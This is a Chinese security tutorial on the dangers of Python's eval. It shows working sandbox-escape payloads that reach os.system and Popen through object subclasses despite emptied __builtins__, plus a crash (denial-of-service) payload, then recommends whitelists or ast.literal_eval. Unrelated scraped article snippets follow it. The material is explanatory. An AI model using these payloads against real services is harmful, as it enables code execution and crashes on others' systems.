Python中eval带来的潜在风险

0x00 前言



eval是Python用于执行python表达式的一个内置函数,使用eval,可以很方便的将字符串动态执行。比如下列代码:


1

2

3

4

>>> eval("1+2")

3

>>> eval("[x for x in range(10)]")

[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

当内存中的内置模块含有os的话,eval同样可以做到命令执行:


1

2

3

4

>>> import os

>>> eval("os.system('whoami')")

win-20140812chj\administrator

0

当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__


1

2

3

4

5

6

7

8

9

10

11

>>> exec('import os')

>>> eval('import os')

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1

    import os

         ^

SyntaxError: invalid syntax

>>> eval("__import__('os').system('whoami')")

win-20140812chj\administrator

0

在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的

模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请
求处理不恰当,就会造成严重的安全漏洞。

0x01 “安全”使用eval



现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:

Eval函数的声明为eval(expression[, globals[, locals]])

其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。


1

2

3

4

5

6

7

8

9

10

11

>>> import os

>>> 'os' in globals()

True

>>> eval('os.system(\'whoami\')')

win-20140812chj\administrator

0

>>> eval('os.system(\'whoami\')',{},{})

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1, in <module>

NameError: name 'os' is not defined

如果指定只允许调用abs函数,可以使用下面的写法:


1

2

3

4

5

6

7

8

9

10

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})

20

>>> eval('os.system(\'whoami\')',{'abs':abs},{'abs':abs})

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1, in <module>

NameError: name 'os' is not defined

>>> eval('os.system(\'whoami\')')

win-20140812chj\administrator

0

使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!

0x02 绕过执行代码1



被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:


1

2

3

4

5

6

7

8

env = {}

env["locals"]   = None

env["globals"= None

env["__name__"] = None

env["__file__"] = None

env["__builtins__"] = None

eval(users_str, env)

Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:


1

2

3

4

>>> __builtins__.abs(-20)

20

>>> abs(-20)

20

我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:


1

2

3

4

5

>>> def hello():

...     print 'shabi'

>>> __builtin__.__dict__['say_hello'] = hello

>>> say_hello()

shabi

小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins____builtin__的一个引用,在__main__模块下,两者是等价的:


1

2

3

4

>>> id(__builtins__)

3549136

>>> id(__builtin__)

3549136

根据乌云drops提到的方法,使用如下代码即可:


1

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代码首先利用__class____subclasses__动态加载了object

象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行
导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。
configobj模块很有意思,居然内置了os模块:


1

2

3

4

5

6

7

8

9

10

11

>>> "os" in configobj.__dict__

True

>>> import urllib

>>> "os" in urllib.__dict__

True

>>> import urllib2

>>> "os" in urllib2.__dict__

True

>>> configobj.os.system("whoami")

win-20140812chj\administrator

0

和configobj类似的模块如urlliburllib2setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:


1

from setuptools import setup, find_packages 

然后执行:


1

python setup.py bdist_egg

就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:


1

2

3

4

5

6

7

8

9

10

11

12

13

>>> env = {}

>>> env["locals"]   = None

>>> env["globals"= None

>>> env["__name__"] = None

>>> env["__file__"] = None

>>> env["__builtins__"] = None

>>> users_str = "[x
for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ ==
'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"

>>> eval(users_str, env)

win-20140812chj\administrator

0

>>> eval(users_str, {}, {})

win-20140812chj\administrator

0

0x03 拒绝服务攻击1



object的子类中有很多有趣的东西,执行以下代码查看:


1

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:


1

2

3

4

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__

 == 'Quitter'][0](0)()", {'__builtins__':None})

C:/>

如果运气好,遇到对方程序中导入了os等敏感模块,那么Popen就可以用,并且绕过__builins__为空的限制,栗子如下:


1

2

3

4

5

6

7

8

9

10

11

>>> import subprocess

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})

<subprocess.Popen object at 0x0324FF70>

>>>

正在 Ping 127.0.0.1 具有 32 字节的数据:

来自 127.0.0.1 的回复: 字节=32 时间<1ms TTL=64

127.0.0.1 的 Ping 统计信息:

    数据包: 已发送 = 1,已接收 = 1,丢失 = 0 (0% 丢失),

往返行程的估计时间(以毫秒为单位):

    最短 = 0ms,最长 = 0ms,平均 = 0ms

>>>

事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。

0x04 拒绝服务攻击2



同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:


1

>>> eval('(lambda
fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0"
language="for"][/c].__subclasses__() if c.__name__ ==
n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()'
, {"__builtins__":None})

运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡。

0x05 总结



从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval

来源:51CTO

时间: 2024-12-29 00:42:44

Python中eval带来的潜在风险的相关文章

央行:警惕商业汇票与信用卡透支潜在风险

中新社北京六月二十二日电(记者 翁阳)根据中国人民银行二十二日公布的今年一季度中国支付体系运行总体情况,一季度非现金支付工具业务笔数继续保持快速增长,业务金额降幅放缓,但商业汇票特别是银行承兑汇票业务以及信用卡透支领域存在潜在风险. 央行报告指出,一季度中国银行业金融机构商业汇票逾期垫款余额快速增长,造成该现象的原因是承兑企业资金不足或无力支付,导致承兑银行,贴现行或转贴现行进行垫款,这表明商业汇票特别是银行承兑汇票业务存在较大潜在风险. 统计显示,一季度实际结算商业汇票(绝大部分为银行承兑汇票

tkinter-Python中eval表达式判断是否合法问题

问题描述 Python中eval表达式判断是否合法问题 我是用的tkinter的从Text获取输入,然后用eval()求值,当输入的表达式错误的时候,会有unexpected EOF while parsing,如何判断这种情况然后提示表达式错误? self.result=tkinter.Toplevel(self.main) self.result.title('') self.result.geometry('160x80+100+120') if(eval(exp.get('1.0','1

Python中的exec、eval使用实例_python

通过exec可以执行动态Python代码,类似Javascript的eval功能:而Python中的eval函数可以计算Python表达式,并返回结果(exec不返回结果,print(eval("-"))打印None): 复制代码 代码如下:    >>> exec("print(\"hello, world\")") hello, world >>> a = 1 >>> exec("

使用Python中的线程进行网络编程的入门教程_python

引言 对于 Python 来说,并不缺少并发选项,其标准库中包括了对线程.进程和异步 I/O 的支持.在许多情况下,通过创建诸如异步.线程和子进程之类的高层模块,Python 简化了各种并发方法的使用.除了标准库之外,还有一些第三方的解决方案,例如 Twisted.Stackless 和进程模块.本文重点关注于使用 Python 的线程,并使用了一些实际的示例进行说明.虽然有许多很好的联机资源详细说明了线程 API,但本文尝试提供一些实际的示例,以说明一些常见的线程使用模式. 全局解释器锁 (G

云计算鲜为人知的三大潜在风险

康奈尔大学实验室最近发布的云计算风险报告指出,虽然云计算从管理和效率的角度看都很有吸引力,但也带来了各种已知和未知的风险. 众所周知的云计算风险话题包括信息安全风险.内部攻击.云宕机等都只是"冰山一角".康奈尔大学的报告指出云计算还存在鲜为人知的三大潜在风险: 一.随着第三方云计算服务越来越多地采取多重硬件资源池,负载均衡和各种松散的云服务之间难以预测的互动可能会导致"云宕机". 二.不透明的分层架构使得很多"独立"云计算服务商实际上在底层共享资

重视ERP系统运行的潜在风险

今年底,中国邮政ERP系统将完成全国推广工作,届时ERP系统的功能模块全面投产应用,这将有助于促进财务核算的自动化,初步实现业务信息与财务信息的有效融合.然而,由于中国邮政独特而复杂的业务场景,外围系统集成条件的不够充分以及基础数据清理工作量较大导致清理未完全到位等因素,ERP系统上线后还存在一些有待完善的地方,对未来系统的运行管理带来一定的潜在风险.本文从技术与管理层面梳理了潜在风险点,探讨了提升系统运行及管理的优化举措,以期保障ERP系统的平稳运行. 技术风险 系统及软硬件支撑方面存在软件风

物联网虽好 潜在风险我们也该重视

[摘要] 物联网无疑会给世界带来极大的改变,不过据外媒 tech 2 报道,一位名叫 Bruce Schneier 的安全技术专家认为人们应当警惕物联网的潜在风险.Schneier 表示:"物联网完善性和可用性方面的风险大于保密性方面的风险."他进一步解释到,造成风险的因素有 3 个:系统的控制软件.系统间的相互连接和系统的自动或自主性.当越来越多的事情都由软件来控制的时候,软件就会成为攻击的弱点.与电脑和智能手机不同,物联网产品价格相对低而 物联网无疑会给世界带来极大的改变,不过据外

谨防网络潜在风险,时刻关注移动设备安全

如今,企业IT环境发展的趋势是越来越多地员工使用移动设备.根据Gartner最近的调查显示,员工在工作时最青睐的移动设备是智能手机,甚至超过了笔记本电脑.截至目前全球有超过十亿的智能手机用户,并且预计今年将售出超过13亿的平板电脑和智能手机. 除此之外,越来越多的企业机构正在实施BYOD.员工喜欢使用自己选择的移动设备,他们认为自己的设备可以带来熟悉感.更高的灵活性,可以帮助他们更好地完成工作.另外,它还消除了学习另一种不同设备或应用程序的需要.事实上,大约30%的受访者表示,即便老板在企业网络

Blue Coat披露“一日游”网站带来的安全风险

2014年9月1日--业务保障技术领导厂商Blue Coat系统公司今天宣布,71%的网站 主机名称(Hostnames)仅仅出现24个小时.虽然在这些被戏称为"一日游"主机名称当中,绝大多数在互联网内容的分享和交付中起了重要的作用,但 它们也为恶意活动提供了掩护, 例如--与已感染系统的通信.Blue Coat安全实验室发布了最新报告<"一日游"主机:恶意软件如何在短命网站中隐藏自己>,其中详细说明了这些"短命"网站的本质和活动,帮